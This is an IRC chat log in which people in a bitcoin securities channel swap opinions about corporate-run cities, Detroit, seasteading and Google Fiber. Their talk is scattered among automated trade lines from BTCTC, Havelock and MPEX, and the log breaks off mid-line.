almost think that's a good thing Jul 22 14:58:09 would that not be 50 lb of gold? Jul 22 14:58:13 [BTCTC] [LTC-ATF.B2] 5 @ 0.010001 = 0.05 BTC [+] Jul 22 14:58:20 Not because it will be blocked, but because it will wake people up to censorship issues Jul 22 14:58:45 i can't wait for the day when everyone uses gpg Jul 22 14:58:53 and it becomes user friendly Jul 22 14:59:07 It's been waiting to become user friendly since 1993 Jul 22 14:59:08 [BTCTC] [AMC-PT] 20 @ 0.00372 = 0.0744 BTC [+] Jul 22 14:59:15 quick survey, different topic Jul 22 14:59:15 [BTCTC] [ASICMINER-PT] 1 @ 4.716 BTC [-] Jul 22 14:59:16 [BTCTC] [AMC-PT] 10 @ 0.003705 = 0.0371 BTC [-] Jul 22 14:59:21 [BTCTC] [ASICMINER-PT] 2 @ 4.728799 = 9.4576 BTC [+] Jul 22 14:59:35 would google have done: Jul 22 14:59:39 [BTCTC] [AMC-PT] 180 @ 0.00372 = 0.6696 BTC [+] Jul 22 14:59:41 A. Worse if it ran detroit Jul 22 14:59:41 [BTCTC] [AMC-PT] 88 @ 0.003732 = 0.3284 BTC [+] Jul 22 14:59:45 B. The Same Jul 22 14:59:51 C. Better job at running detroit Jul 22 14:59:55 lol Jul 22 15:00:13 actually, 1991 Jul 22 15:00:17 I don't think it is possible to do much worse... Jul 22 15:00:28 i dont believe in answering wildly fantastic what ifs Jul 22 15:00:50 I don't think it is that fantastic Jul 22 15:00:59 it would be the same Jul 22 15:01:01 I mean i think it would be great Jul 22 15:01:04 I don't think it'd be the same Jul 22 15:01:07 think about it Jul 22 15:01:10 [BTCTC] [TAT.ASICMINER] 17 @ 0.045666 = 0.7763 BTC [-] Jul 22 15:01:16 everyone fails when they try to manage other peoples lives through government Jul 22 15:01:16 a good what-if has to be within the possibility of occurring in the recent past Jul 22 15:01:17 you can buy houses and land in detroit now for like $47.50 Jul 22 15:01:30 or the near future Jul 22 15:01:36 [BTCTC] [ASICMINER-PT] 1 @ 4.716 BTC [-] Jul 22 15:01:44 so if i was looking for data centers, and space Jul 22 15:01:46 i would go there Jul 22 15:01:53 and i would incorporate my own city Jul 22 15:02:01 plan out the housing, and infrastructure Jul 22 15:02:01 [BTCTC] [DMS.SELLING] 70 @ 0.0252 = 1.764 BTC [+] Jul 22 15:02:02 would your employees wanna live there? Jul 22 15:02:10 to work at google? yes Jul 22 15:02:27 I thought they already gave corporate control to detroit, or maybe it was michigan... Jul 22 15:02:32 you pay them well, and isolate yourself and your employees from the outside world of detroit with private security Jul 22 15:02:47 and that is nothing new Jul 22 15:02:54 [BTCTC] [AMC-PT] 232 @ 0.0038 = 0.8816 BTC [+] Jul 22 15:02:57 [BTCTC] [TAT.ASICMINER] 13 @ 0.045675 = 0.5938 BTC [+] Jul 22 15:03:02 all corporate complexes and gated communities already have private security Jul 22 15:03:10 just combine the two things into one Jul 22 15:03:21 and add some infrastructure Jul 22 15:03:27 why does Google choose to grow into successful cities then? Jul 22 15:03:30 and not ghettos Jul 22 15:03:39 just saying that is possible, and not hard to do Jul 22 15:03:53 and I don't think they always do choose that Jul 22 15:04:04 kansas? not succesful, but maybe not ghetto Jul 22 15:04:18 I'm guessing kansas was strategic Jul 22 15:04:23 being center of the US Jul 22 15:04:25 besides their corporate presence in ny and ca Jul 22 15:04:30 I want to move to Kansas for Google Fiber Jul 22 15:04:31 they are only in remote locations Jul 22 15:04:35 wtf is going on with just dice Jul 22 15:04:44 parseval: would you move to detroit for google fiber? Jul 22 15:04:45 I have a 50/35 connection now, but I want 1GB/1GB Jul 22 15:04:52 I would do taht Jul 22 15:04:59 i think most would Jul 22 15:05:00 i would move to kansas before detroit Jul 22 15:05:08 jobs, good internet, and benefits Jul 22 15:05:14 I'd look for a WFH job and get cheap housing and fast internet Jul 22 15:05:15 organization that can actually organize Jul 22 15:05:19 exactly Jul 22 15:05:29 you could own your house for literally under $500 Jul 22 15:05:40 keep all your salary Jul 22 15:05:45 Doesn't Vermont offer a fiber service for less than the of Google and it's faster Jul 22 15:06:10 anyways, just think about this...when anything fails, you can usually pick up stuff at fire sale prices Jul 22 15:06:29 like any other failure, it was usually due to the mgmt, not the people or the situation Jul 22 15:06:53 i think most cities in the US have proven that they suck at mgmt Jul 22 15:07:17 but amazon, google, and apple (to some extent) have proven that they can manage Jul 22 15:07:54 anyways, this is just the mapping of reality onto Neal Stephenson stories (quite prescient author IMO) Jul 22 15:08:39 i know my city managers are painfully horrible Jul 22 15:08:46 almost all are Jul 22 15:08:57 imagine a city built for the future Jul 22 15:08:59 13% of my coinflow site visitors have chinese as their primary language.. A few weeks ago it was significantly less. I wonder if BTC is trending up in China more now Jul 22 15:09:28 where public transit works and is nice, where its laid out in a way that makes sense, and designed well Jul 22 15:09:32 [BTCTC] [B.YABMC] 7 @ 0.0027 = 0.0189 BTC [-] Jul 22 15:10:03 using technology...i think that the tech guys should build a model city, with its own schools, health care, and public services (fire, police, etc) Jul 22 15:10:33 i give them 100% odds to do better than management of detroit, and over 50% to be successful in general Jul 22 15:11:22 mjr_: lets hope that one of the superwhales here does this (if bitcoin becomes mainstream) Jul 22 15:11:39 takes balls to do something like that Jul 22 15:11:51 [BTCTC] [TAT.ASICMINER] 26 @ 0.045675 = 1.1876 BTC [+] Jul 22 15:11:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.045675 = 0.0914 BTC [+] Jul 22 15:12:35 if you're gonna buy a cheap city, is the US the best place though? Jul 22 15:13:00 aka filthy rich, doesn't give a shit about the status quo Jul 22 15:13:03 also consider stuff like those BlueSeed guys Jul 22 15:13:08 mjr_, it could happen with the seasteading institute Jul 22 15:13:26 ThickAsThieves, exactly Jul 22 15:14:03 we will startup countries within the next 10-20 years Jul 22 15:14:20 sooner I think Jul 22 15:14:28 [BTCTC] [AMC-PT] 1 @ 0.00375 BTC [-] Jul 22 15:14:34 [BTCTC] [AMC-PT] 19 @ 0.003706 = 0.0704 BTC [-] Jul 22 15:14:36 [BTCTC] [AMC-PT] 673 @ 0.003705 = 2.4935 BTC [-] Jul 22 15:14:37 [BTCTC] [AMC-PT] 500 @ 0.0037 = 1.85 BTC [-] Jul 22 15:15:04 country starting chatter from directly interested parties is only 1-3 degrees of separation from any of us Jul 22 15:16:02 bitcoin is pushing people to think of new paradigms that suit its own Jul 22 15:17:23 [BTCTC] [AMC-PT] 1800 @ 0.00361 = 6.498 BTC [-] Jul 22 15:17:25 [BTCTC] [AMC-PT] 1 @ 0.00361 BTC [-] Jul 22 15:17:26 [BTCTC] [AMC-PT] 1000 @ 0.0036 = 3.6 BTC [-] Jul 22 15:17:28 [BTCTC] [AMC-PT] 3000 @ 0.0035 = 10.5 BTC [-] Jul 22 15:17:29 [BTCTC] [AMC-PT] 2000 @ 0.0035 = 7 BTC [-] Jul 22 15:17:31 [BTCTC] [AMC-PT] 1000 @ 0.0035 = 3.5 BTC [-] Jul 22 15:17:32 [BTCTC] [AMC-PT] 5000 @ 0.0035 = 17.5 BTC [-] Jul 22 15:17:34 [BTCTC] [AMC-PT] 1095 @ 0.00349 = 3.8216 BTC [-] Jul 22 15:17:35 [BTCTC] [AMC-PT] 100 @ 0.003302 = 0.3302 BTC [-] Jul 22 15:17:37 [BTCTC] [AMC-PT] 20 @ 0.003302 = 0.066 BTC [-] Jul 22 15:17:38 [BTCTC] [AMC-PT] 1350 @ 0.003302 = 4.4577 BTC [-] Jul 22 15:17:39 [BTCTC] [AMC-PT] 84 @ 0.0033 = 0.2772 BTC [-] Jul 22 15:17:41 [BTCTC] [AMC-PT] 75 @ 0.0033 = 0.2475 BTC [-] Jul 22 15:17:43 [BTCTC] [AMC-PT] 600 @ 0.0033 = 1.98 BTC [-] Jul 22 15:17:45 [BTCTC] [AMC-PT] 232 @ 0.0033 = 0.7656 BTC [-] Jul 22 15:17:46 [BTCTC] [AMC-PT] 114 @ 0.00322 = 0.3671 BTC [-] Jul 22 15:17:48 [BTCTC] [AMC-PT] 500 @ 0.003102 = 1.551 BTC [-] Jul 22 15:17:49 [BTCTC] [AMC-PT] 1325 @ 0.003101 = 4.1088 BTC [-] Jul 22 15:17:49 Options, or dumping? Jul 22 15:17:50 [BTCTC] [AMC-PT] 1150 @ 0.00301 = 3.4615 BTC [-] Jul 22 15:17:52 [BTCTC] [AMC-PT] 3099 @ 0.003001 = 9.3001 BTC [-] Jul 22 15:17:58 Looks like a dump Jul 22 15:18:18 pump n dump Jul 22 15:18:29 cost of doing business for AMC Jul 22 15:18:38 Yeah, I noticed that upward spike this morning Jul 22 15:19:45 maybe he's prepping to put a new ask wall up at 3 Jul 22 15:19:57 just laying some foundation first Jul 22 15:21:20 [BTCTC] [ASICMINER-PT] 5 @ 4.7288 = 23.644 BTC [+] Jul 22 15:22:22 I was thinking of making an easy library for BTCTC API but I'm a little worried it might help botters.. however, if they need a third party API to make it work for them, then in all likelihood they would be easily manipulated bots Jul 22 15:23:40 [BTCTC] [AMC-PT] 1 @ 0.0034 BTC [+] Jul 22 15:23:49 [BTCTC] [AMC-PT] 30 @ 0.0031 = 0.093 BTC [-] Jul 22 15:23:51 [BTCTC] [AMC-PT] 20 @ 0.003002 = 0.06 BTC [-] Jul 22 15:23:56 [BTCTC] [AMC-PT] 110 @ 0.003002 = 0.3302 BTC [-] Jul 22 15:23:58 [BTCTC] [AMC-PT] 2000 @ 0.003001 = 6.002 BTC [-] Jul 22 15:23:59 [BTCTC] [AMC-PT] 320 @ 0.003001 = 0.9603 BTC [-] Jul 22 15:24:01 [BTCTC] [AMC-PT] 265 @ 0.003 = 0.795 BTC [-] Jul 22 15:24:03 [BTCTC] [AMC-PT] 4000 @ 0.003 = 12 BTC [-] Jul 22 15:24:05 [BTCTC] [AMC-PT] 100 @ 0.003 = 0.3 BTC [-] Jul 22 15:24:06 [BTCTC] [AMC-PT] 1180 @ 0.002961 = 3.494 BTC [-] Jul 22 15:24:35 i do like seasteading, but its a tougher sell right now...and yes, i agree that startup cities will happen soon Jul 22 15:24:51 my point is that if people have a choice, they will pick the best option Jul 22 15:25:01 [BTCTC] [AMC-PT] 65 @ 0.0031 = 0.2015 BTC [+] Jul 22 15:25:32 wel... Jul 22 15:25:42 basically, i want to live in mr. lee's greater hong kong Jul 22 15:25:58 [BTCTC] [DMS.SELLING] 4 @ 0.0255 = 0.102 BTC [+] Jul 22 15:26:08 i mean that kind of stuff would be relatively easy to do...think robocop lol Jul 22 15:26:10 [BTCTC] [AMC-PT] 150 @ 0.00299 = 0.4485 BTC [-] Jul 22 15:26:11 [BTCTC] [AMC-PT] 320 @ 0.002961 = 0.9475 BTC [-] Jul 22 15:26:12 [BTCTC] [AMC-PT] 1 @ 0.00296 BTC [-] Jul 22 15:26:14 [BTCTC] [AMC-PT] 100 @ 0.00295 = 0.295 BTC [-] Jul 22 15:26:16 [BTCTC] [AMC-PT] 855 @ 0.002901 = 2.4804 BTC [-] Jul 22 15:26:31 parseval, pm Jul 22 15:26:35 [BTCTC] [AMC-PT] 1 @ 0.0031 BTC [+] Jul 22 15:27:02 parseval_ * Jul 22 15:27:57 [BTCTC] [AMC-PT] 11 @ 0.0031 = 0.0341 BTC [+] Jul 22 15:28:34 [BTCTC] [AMC-PT] 588 @ 0.0031 = 1.8228 BTC [+] Jul 22 15:28:41 [HAVELOCK] [SDSTM] 1 @ 0.01099 BTC [-] Jul 22 15:29:26 [BTCTC] [AMC-PT] 520 @ 0.00325 = 1.69 BTC [+] Jul 22 15:29:50 [BTCTC] [AMC-PT] 235 @ 0.0031 = 0.7285 BTC [-] Jul 22 15:30:14 [HAVELOCK] [AM100] 1 @ 0.044787 BTC [+] Jul 22 15:30:19 [BTCTC] [AMC-PT] 1 @ 0.00325 BTC [+] Jul 22 15:30:34 [BTCTC] [LTC-ATF.B2] 7 @ 0.010001 = 0.07 BTC [+] Jul 22 15:31:23 [HAVELOCK] [SMG] 1 @ 0.000278 BTC [+] Jul 22 15:31:38 [BTCTC] [BASIC-MINING] 1 @ 0.661001 BTC [-] Jul 22 15:31:55 [BTCTC] [AMC-PT] 79 @ 0.00325 = 0.2568 BTC [+] Jul 22 15:32:28 [HAVELOCK] [SDSTM] 2 @ 0.01099 = 0.022 BTC [-] Jul 22 15:33:39 [BTCTC] [AMC-PT] 118 @ 0.003125 = 0.3688 BTC [-] Jul 22 15:33:58 [BTCTC] [BASIC-MINING] 1 @ 0.661001 BTC [-] Jul 22 15:34:31 [BTCTC] [RSM] 778 @ 0.018 = 14.004 BTC [+] Jul 22 15:35:38 [HAVELOCK] [SMG] 199 @ 0.000278 = 0.0553 BTC [+] Jul 22 15:36:40 [HAVELOCK] [SMG] 1 @ 0.000278 BTC [+] Jul 22 15:36:51 [BTCTC] [AMC-PT] 63 @ 0.0033 = 0.2079 BTC [+] Jul 22 15:37:08 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003351 = 0.0335 BTC [-] Jul 22 15:37:11 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00335 BTC [-] Jul 22 15:37:12 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.003167 = 0.1267 BTC [-] Jul 22 15:37:14 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.003163 = 0.9489 BTC [-] Jul 22 15:37:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.045667 BTC [-] Jul 22 15:37:17 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00315 = 0.315 BTC [-] Jul 22 15:37:20 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.003143 = 0.6286 BTC [-] Jul 22 15:37:22 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003102 = 0.3102 BTC [-] Jul 22 15:37:33 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003101 = 0.3101 BTC [-] Jul 22 15:37:35 [BTCTC] [AMC-PT] 2 @ 0.0033 = 0.0066 BTC [+] Jul 22 15:37:36 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0031 = 0.31 BTC [-] Jul 22 15:37:38 [BTCTC] [TAT.VIRTUALMINE] 1000 @ 0.0031 = 3.1 BTC [-] Jul 22 15:37:40 [BTCTC] [TAT.VIRTUALMINE] 283 @ 0.00301 = 0.8518 BTC [-] Jul 22 15:38:16 [BTCTC] [TAT.ASICMINER] 19 @ 0.045194 = 0.8587 BTC [-] Jul 22 15:39:22 [BTCTC] [AMC-PT] 3 @ 0.0033 = 0.0099 BTC [+] Jul 22 15:40:06 [HAVELOCK] [AM100] 7 @ 0.044787 = 0.3135 BTC [+] Jul 22 15:40:08 [BTCTC] [AMC-PT] 5 @ 0.0033 = 0.0165 BTC [+] Jul 22 15:40:17 [BTCTC] [TAT.ASICMINER] 17 @ 0.045674 = 0.7765 BTC [+] Jul 22 15:40:53 [BTCTC] [TAT.ASICMINER] 23 @ 0.045194 = 1.0395 BTC [-] Jul 22 15:41:13 [BTCTC] [BASIC-MINING] 1 @ 0.661001 BTC [-] Jul 22 15:41:22 [BTCTC] [AMC-PT] 55 @ 0.00335 = 0.1843 BTC [+] Jul 22 15:41:53 [HAVELOCK] [AM100] 115 @ 0.043312 = 4.9809 BTC [-] Jul 22 15:42:27 [BTCTC] [AMC-PT] 13 @ 0.0034 = 0.0442 BTC [+] Jul 22 15:43:06 [BTCTC] [AMC-PT] 45 @ 0.00335 = 0.1508 BTC [-] Jul 22 15:43:08 [BTCTC] [AMC-PT] 55 @ 0.0034 = 0.187 BTC [+] Jul 22 15:44:36 [BTCTC] [ASICMINER-PT] 5 @ 4.7 = 23.5 BTC [-] Jul 22 15:46:38 [BTCTC] [BASIC-MINING] 1 @ 0.694998 BTC [+] Jul 22 15:48:31 [BTCTC] [AMC-PT] 30 @ 0.0034 = 0.102 BTC [+] Jul 22 15:50:39 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003299 = 0.033 BTC [+] Jul 22 15:54:02 [BTCTC] [DMS.SELLING] 3 @ 0.025 = 0.075 BTC [-] Jul 22 15:55:03 [BTCTC] [TAT.ASICMINER] 15 @ 0.045198 = 0.678 BTC [+] Jul 22 15:55:30 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.003399 = 0.136 BTC [+] Jul 22 15:55:43 [BTCTC] [AMC-PT] 400 @ 0.003325 = 1.33 BTC [-] Jul 22 15:56:54 [BTCTC] [AMC-PT] 20 @ 0.003326 = 0.0665 BTC [+] Jul 22 15:56:56 [BTCTC] [AMC-PT] 175 @ 0.0033 = 0.5775 BTC [-] Jul 22 15:58:18 [BTCTC] [AMC-PT] 20 @ 0.0033 = 0.066 BTC [-] Jul 22 15:58:20 [BTCTC] [AMC-PT] 21 @ 0.0033 = 0.0693 BTC [-] Jul 22 15:59:04 [BTCTC] [AMC-PT] 75 @ 0.00339 = 0.2543 BTC [+] Jul 22 15:59:52 [BTCTC] [AMC-PT] 159 @ 0.0033 = 0.5247 BTC [-] Jul 22 16:01:37 [BTCTC] [AMC-PT] 21 @ 0.003151 = 0.0662 BTC [-] Jul 22 16:01:38 [BTCTC] [AMC-PT] 6 @ 0.003151 = 0.0189 BTC [-] Jul 22 16:02:32 [HAVELOCK] [SDSTM] 1 @ 0.01099999 BTC [+] Jul 22 16:02:35 [BTCTC] [ASICMINER-PT] 1 @ 4.729997 BTC [+] Jul 22 16:04:27 [BTCTC] [LTC-ATF.B2] 1 @ 0.010291 BTC [+] Jul 22 16:04:59 [HAVELOCK] [AM1] 2 @ 4.7 = 9.4 BTC [+] Jul 22 16:05:17 [BTCTC] [AMC-PT] 1 @ 0.0032 BTC [+] Jul 22 16:05:18 [BTCTC] [TAT.VIRTUALMINE] 144 @ 0.003399 = 0.4895 BTC [+] Jul 22 16:05:26 [HAVELOCK] [AM100] 12 @ 0.044789 = 0.5375 BTC [+] Jul 22 16:05:55 [MPEX] [S.MPOE] 11350 @ 0.00080799 = 9.1707 BTC [-] Jul 22 16:07:19 [BTCTC] [AMC-PT] 1 @ 0.003388 BTC [+] Jul 22 16:08:24 [BTCTC] [ASICMINER-PT] 4 @ 4.729997 = 18.92 BTC [+] Jul 22 16:08:26 [BTCTC] [ASICMINER-PT] 6 @ 4.729998 = 28.38 BTC [+] Jul 22 16:08:28 [BTCTC] [ASICMINER-PT] 4 @ 4.73 = 18.92 BTC [+] Jul 22 16:08:29 [BTCTC] [ASICMINER-PT] 1 @ 4.74999 BTC [+] Jul 22 16:08:31 [BTCTC] [AMC-PT] 5 @ 0.003389 = 0.0169 BTC [+] Jul 22 16:08:32 [BTCTC] [AMC-PT] 7 @ 0.00339 = 0.0237 BTC [+] Jul 22 16:08:33 [BTCTC] [ASICMINER-PT] 2 @ 4.755 = 9.51 BTC [+] Jul 22 16:11:50 [BTCTC] [AMC-PT] 100 @ 0.003152 = 0.3152 BTC [-] Jul 22 16:11:52 [BTCTC] [AMC-PT] 1 @ 0.003151 BTC [-] Jul 22 16:11:53 [BTCTC] [AMC-PT] 5 @ 0.003151 = 0.0158 BTC [-] Jul 22 16:12:03 [BTCTC] [AMC-PT] 894 @ 0.00315 = 2.8161 BTC [-] Jul 22 16:14:17 [HAVELOCK] [SDSTM] 2 @ 0.01099999 = 0.022 BTC [+] Jul 22 16:14:52 [HAVELOCK] [SDSTM] 5 @ 0.011 = 0.055 BTC [+] Jul 22 16:18:27 [BTCTC] [ASICMINER-PT] 1 @ 4.77899 BTC [+] Jul 22 16:18:29 [BTCTC] [ASICMINER-PT] 1 @ 4.779 BTC [+] Jul 22 16:18:33 [BTCTC] [AMC-PT] 100 @ 0.003349 = 0.3349 BTC [+] Jul 22 16:18:35 [BTCTC] [AMC-PT] 100 @ 0.00335 = 0.335 BTC [+] Jul 22 16:18:36 [BTCTC] [AMC-PT] 21 @ 0.003389 = 0.0712 BTC [+] Jul 22 16:18:38 [BTCTC] [AMC-PT] 183 @ 0.00339 = 0.6204 BTC [+] Jul 22 16:18:39 [BTCTC] [AMC-PT] 20 @ 0.00339 = 0.0678 BTC [+] Jul 22 16:18:41 [BTCTC] [AMC-PT] 76 @ 0.0034 = 0.2584 BTC [+] Jul 22 16:18:50 kakobreklaa: Would it be possible for me to get a login for the MPEx websocket? Jul 22 16:22:07 [BTCTC] [AMC-PT] 80 @ 0.0034 = 0.272 BTC [+] Jul 22 16:22:54 [BTCTC] [DMS.MINING] 1 @ 0.014999 BTC [-] Jul 22 16:24:51 [BTCTC] [AMC-PT] 496 @ 0.0034 = 1.6864 BTC [+] Jul 22 16:24:53 [BTCTC] [AMC-PT] 24 @ 0.0034 = 0.0816 BTC [+] Jul 22 16:25:52 [BTCTC] [AMC-PT] 100 @ 0.003425 = 0.3425 BTC [+] Jul 22 16:26:52 [BTCTC] [AMC-PT] 800 @ 0.00345 = 2.76 BTC [+] Jul 22 16:27:40 [MPEX] [S.MPOE] 1429 @ 0.00080782 = 1.1544 BTC [-] Jul 22 16:28:49 [BTCTC] [AMC-PT] 100 @ 0.0035 = 0.35 BTC [+] Jul 22 16:29:01 [BTCTC] [DMS.MINING] 5 @ 0.014999 = 0.075 BTC [-] Jul 22 16:29:13 [BTCTC] [AMC-PT] 1 @ 0.00357 BTC [+] Jul 22 16:30:21 [BTCTC] [AMC-PT] 55 @ 0.0035 = 0.1925 BTC [-] Jul 22 16:30:49 [BTCTC] [ASICMINER-PT] 1 @ 4.778999 BTC [-] Jul 22 16:30:59 [BTCTC] [AMC-PT] 45 @ 0.0032 = 0.144 BTC [-] Jul 22 16:34:05 [HAVELOCK] [AM100] 5 @ 0.0445 = 0.2225 BTC [-] Jul 22 16:34:34 [HAVELOCK] [AM100] 2 @ 0.04479 = 0.0896 BTC [+] Jul 22 16:34:47 [BTCTC] [ASICMINER-PT] 1 @ 4.779 BTC [+] Jul 22 16:34:49 [BTCTC] [ASICMINER-PT] 1 @ 4.779 BTC [+] Jul 22 16:34:51 [BTCTC] [ASICMINER-PT] 1 @ 4.784955 BTC [+] Jul 22 16:34:51 [BTCTC] [ASICMINER-PT] 1 @ 4.799989 BTC [+] Jul 22 16:34:53 [BTCTC] [ASICMINER-PT] 1 @ 4.79999 BTC [+] Jul 22 16:34:55 [BTCTC] [ASICMINER-PT] 3 @ 4.799998 = 14.4 BTC [+] Jul 22 16:34:56 [BTCTC] [ASICMINER-PT] 1 @ 4.799999 BTC [+] Jul 22 16:37:30 [BTCTC] [AMC-PT] 7 @ 0.0034 = 0.0238 BTC [+] Jul 22 16:39:07 [BTCTC] [TAT.ASICMINER] 35 @ 0.04566 = 1.5981 BTC [+] Jul 22 16:39:17 [HAVELOCK] [SDSTM] 10 @ 0.011 = 0.11 BTC [+] Jul 22 16:41:57 [BTCTC] [RSM] 39 @ 0.01689 = 0.6587 BTC [-] Jul 22 16:42:08 [BTCTC] [AMC-PT] 100 @ 0.003301 = 0.3301 BTC [-] Jul 22 16:42:10 [BTCTC] [AMC-PT] 100 @ 0.0033 = 0.33 BTC [-] Jul 22 16:43:02 [BTCTC] [BTC-BOND] 71 @ 0.01 = 0.71 BTC [+] Jul 22 16:47:26 [MPEX] [S.MPOE] 11900 @ 0.00080782 = 9.6131 BTC [-] Jul 22 16:48:35 [BTCTC] [AMC-PT] 393 @ 0.0034 = 1.3362 BTC [+] Jul 22 16:48:37 [BTCTC] [AMC-PT] 100 @ 0.0034 = 0.34 BTC [+] Jul 22 16:50:23 [BTCTC] [AMC-PT] 49 @ 0.003444 = 0.1688 BTC [+] Jul 22 16:50:38 [BTCTC] [DMS.SELLING] 12 @ 0.0252 = 0.3024 BTC [+] Jul 22 16:50:50 [BTCTC] [AMC-PT] 51 @ 0.003455 = 0.1762 BTC [+] Jul 22 16:51:49 [BTCTC] [ASICMINER-PT] 1 @ 4.799999 BTC [+] Jul 22 16:51:51 [BTCTC] [AMC-PT] 100 @ 0.0035 = 0.35 BTC [+] Jul 22 16:51:55 [BTCTC] [COGNITIVE] 1 @ 0.791001 BTC [+] Jul 22 16:51:58 [HAVELOCK] [SDSTM] 3 @ 0.010999 = 0.033 BTC [-] Jul 22 16:52:31 [BTCTC] [AMC-PT] 20 @ 0.003579 = 0.0716 BTC [+] Jul 22 16:52:35 [BTCTC] [COGNITIVE] 1 @ 0.791 BTC [-] Jul 22 16:52:42 [BTCTC] [DMS.PURCHASE] 50 @ 0.039477 = 1.9739 BTC [+] Jul 22 16:52:51 [BTCTC] [COGNITIVE] 6 @ 0.79 = 4.74 BTC [-] Jul 22 16:53:08 [BTCTC] [AMC-PT] 656 @ 0.00358 = 2.3485 BTC [+] Jul 22 16:54:05 [BTCTC] [AMC-PT] 150 @ 0.0036 = 0.54 BTC [+] Jul 22 16:54:30 [BTCTC] [AMC-PT] 1000 @ 0.0036 = 3.6 BTC [+] Jul 22 16:54:32 [BTCTC] [AMC-PT] 100 @ 0.0036 = 0.36 BTC [+] Jul 22 16:54:58 [BTCTC] [BASIC-MINING] 3 @ 0.650001 = 1.95 BTC [-] Jul 22 16:55:00 [BTCTC] [BASIC-MINING] 1 @ 0.65 BTC [-] Jul 22 16:55:02 [BTCTC] [BASIC-MINING] 1 @ 0.631 BTC [-] Jul 22 16:55:03 [BTCTC] [BASIC-MINING] 12 @ 0.63015 = 7.5618 BTC [-] Jul 22 16:55:15 [BTCTC] [BASIC-MINING] 1 @ 0.6301 BTC [-] Jul 22 16:55:17 [BTCTC] [BASIC-MINING] 6 @ 0.63 = 3.78 BTC [-] Jul 22 16:55:19 [BTCTC] [BASIC-MINING] 6 @ 0.63 = 3.78 BTC [-] Jul 22 16:55:39 [BTCTC] [AMC-PT] 100 @ 0.0037 = 0.37 BTC [+] Jul 22 16:56:38 [BTCTC] [ASICMINER-PT] 26 @ 4.799999 = 124.8 BTC [+] Jul 22 16:57:08 nice Jul 22 16:57:55 [BTCTC] [TAT.ASICMINER] 5 @ 0.045674 = 0.2284 BTC [+] Jul 22 16:58:29 [BTCTC] [AMC-PT] 7 @ 0.00373 = 0.0261 BTC [+] Jul 22 16:58:50 [BTCTC] [TAT.ASICMINER] 34 @ 0.045675 = 1.553 BTC [+] Jul 22 16:59:51 [BTCTC] [AMC-PT] 243 @ 0.00373 = 0.9064 BTC [+] Jul 22 17:02:52 [BTCTC] [AMC-PT] 1000 @ 0.0037 = 3.7 BTC [-] Jul 22 17:03:10 [BTCTC] [DMS.MINING] 1 @ 0.01421 BTC [-] Jul 22 17:03:12 [BTCTC] [DMS.MINING] 84 @ 0.014201 = 1.1929 BTC [-] Jul 22 17:03:14 [BTCTC] [DMS.MINING] 61 @ 0.014201 = 0.8663 BTC [-] Jul 22 17:03:16 [BTCTC] [DMS.MINING] 1 @ 0.014201 BTC [-] Jul 22 17:03:18 [BTCTC] [DMS.MINING] 6 @ 0.0142 = 0.0852 BTC [-] Jul 22 17:03:20 [BTCTC] [DMS.MINING] 100 @ 0.0142 = 1.42 BTC [-] Jul 22 17:03:21 [BTCTC] [DMS.MINING] 4 @ 0.014155 = 0.0566 BTC [-] Jul 22 17:03:23 [BTCTC] [DMS.MINING] 60 @ 0.01415 = 0.849 BTC [-] Jul 22 17:03:23 [BTCTC] [DMS.MINING] 19 @ 0.013933 = 0.2647 BTC [-] Jul 22 17:03:25 [BTCTC] [DMS.MINING] 34 @ 0.013901 = 0.4726 BTC [-] Jul 22 17:05:34 [BTCTC] [AMC-PT] 100 @ 0.00379 = 0.379 BTC [+] Jul 22 17:06:05 [BTCTC] [DMS.PURCHASE] 20 @ 0.039476 = 0.7895 BTC [-] Jul 22 17:06:07 [BTCTC] [DMS.PURCHASE] 80 @ 0.039477 = 3.1582 BTC [+] Jul 22 17:06:50 [BTCTC] [TAT.ASICMINER] 6 @ 0.045989 = 0.2759 BTC [+] Jul 22 17:06:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.045989 = 0.092 BTC [+] Jul 22 17:06:54 [BTCTC] [TAT.ASICMINER] 7 @ 0.045989 = 0.3219 BTC [+] Jul 22 17:07:01 [BTCTC] [AMC-PT] 100 @ 0.0038 = 0.38 BTC [+] Jul 22 17:08:08 [BTCTC] [AMC-PT] 100 @ 0.003848 = 0.3848 BTC [+] Jul 22 17:08:09 [BTCTC] [AMC-PT] 268 @ 0.003849 = 1.0315 BTC [+] Jul 22 17:08:45 [BTCTC] [TAT.ASICMINER] 22 @ 0.045989 = 1.0118 BTC [+] Jul 22 17:08:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.045989 BTC [+] Jul 22 17:08:59 [BTCTC] [TAT.ASICMINER] 6 @ 0.04599 = 0.2759 BTC [+] Jul 22 17:09:33 [BTCTC] [AMC-PT] 100 @ 0.0039 = 0.39 BTC [+] Jul 22 17:09:46 what a bounce back Jul 22 17:10:22 [BTCTC] [AMC-PT] 1 @ 0.003949 BTC [+] Jul 22 17:10:34 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0034 = 0.0068 BTC [+] Jul 22 17:10:37 [BTCTC] [AMC-PT] 100 @ 0.004 = 0.4 BTC [+] Jul 22 17:10:39 [BTCTC] [AMC-PT] 400 @ 0.004 = 1.6 BTC [+] Jul 22 17:10:41 [BTCTC] [AMC-PT] 305 @ 0.004 = 1.22 BTC [+] Jul 22 17:10:42 [BTCTC] [AMC-PT] 200 @ 0.004 = 0.8 BTC [+] Jul 22 17:10:44 [BTCTC] [AMC-PT] 100 @ 0.004 = 0.4 BTC [+] Jul 22 17:11:01 [BTCTC] [AMC-PT] 100 @ 0.0041 = 0.41 BTC [+] Jul 22 17:11:15 [BTCTC] [AMC-PT] 1300 @ 0.00414 = 5.382 BTC [+] Jul 22 17:11:38 [BTCTC] [AMC-PT] 201 @ 0.0039 = 0.7839 BTC [-] Jul 22 17:11:46 [BTCTC] [AMC-PT] 199 @ 0.0039 = 0.7761 BTC [-] Jul 22 17:15:29 [BTCTC] [AMC-PT] 1000 @ 0.003588 = 3.588 BTC [-] Jul 